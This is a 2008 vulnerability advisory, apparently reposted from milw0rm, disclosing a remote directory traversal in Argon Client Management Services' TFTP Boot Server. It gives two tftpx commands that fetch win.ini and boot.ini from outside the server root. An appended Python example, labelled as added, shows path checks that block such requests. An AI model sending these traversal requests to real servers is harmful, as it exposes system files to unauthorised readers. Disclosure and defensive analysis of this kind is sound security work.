#######################################################################

                             Luigi Auriemma

Application:  Argon Client Management Services
              http://www.argontechnology.com/product.aspx/cid1/43
Versions:     <= 1.31 (TFTP Boot Server <= 2.5.3.1)
Platforms:    Windows
Bug:          directory traversal in TFTP Boot Server
Exploitation: remote
Date:         08 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"Client Management Services® (CMS) includes all the server-based
services (PXE Server, BOOTP Server) and administration tools needed to
setup an open network boot environment. You can deploy your favorite
third party client management tools in a pre-OS booting phase."


#######################################################################

======
2) Bug
======


The TFTP Boot Server is affected by a classic directory traversal
vulnerability which allows an attacker to download (upload is not
allowed) any file from the disk where the tftp folder is located.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/tftpx.zip

tftpx SERVER ../../windows/win.ini none
tftpx SERVER ..\boot.ini none


#######################################################################

======
4) Fix
======


No fix
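
A TFTP server avoids this class of bug by normalising the requested name and refusing anything that resolves outside its root folder. The following is an added example, not code from this advisory or from the vendor; the root C:\tftpboot and all function names are assumptions.

```python
import ntpath
import struct

TFTP_ROOT = r"C:\tftpboot"  # assumed root folder, not taken from the advisory
OP_RRQ = 1                  # TFTP read request opcode (RFC 1350)


def parse_rrq(packet: bytes):
    """Return (filename, mode) from a read request, or None if malformed."""
    if len(packet) < 4 or struct.unpack("!H", packet[:2])[0] != OP_RRQ:
        return None
    fields = packet[2:].split(b"\x00")  # filename NUL mode NUL [options...]
    if len(fields) < 3 or not fields[0]:
        return None
    return (fields[0].decode("ascii", "replace"),
            fields[1].decode("ascii", "replace").lower())


def resolve_in_root(filename: str, root: str = TFTP_ROOT):
    """Map a requested name to a path below root; None if it would escape."""
    name = filename.replace("/", "\\")  # Windows accepts both separators
    drive, tail = ntpath.splitdrive(name)
    if drive or tail.startswith("\\") or ":" in name:
        return None  # drive-qualified, UNC, rooted, or stream syntax
    # Collapse ".." lexically, then require the result to stay under root.
    # A real server should also resolve junctions/symlinks before this test.
    candidate = ntpath.normpath(ntpath.join(root, name))
    prefix = ntpath.normcase(ntpath.normpath(root)).rstrip("\\") + "\\"
    return candidate if ntpath.normcase(candidate).startswith(prefix) else None


def check_request(packet: bytes) -> str:
    """Decision a server would take for one datagram: drop, deny or serve."""
    request = parse_rrq(packet)
    if request is None:
        return "drop"
    path = resolve_in_root(request[0])
    return "deny" if path is None else "serve " + path


if __name__ == "__main__":
    # Constructed sample requests; the first two names are the advisory's.
    for name in ("../../windows/win.ini", "..\\boot.ini", "pxelinux.0"):
        packet = struct.pack("!H", OP_RRQ) + name.encode() + b"\x00octet\x00"
        print(f"{name!r:28} -> {check_request(packet)}")
```

The module uses ntpath so the Windows path rules are applied identically when the check is run on a non-Windows host.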


#######################################################################

# milw0rm.com [2008-03-10]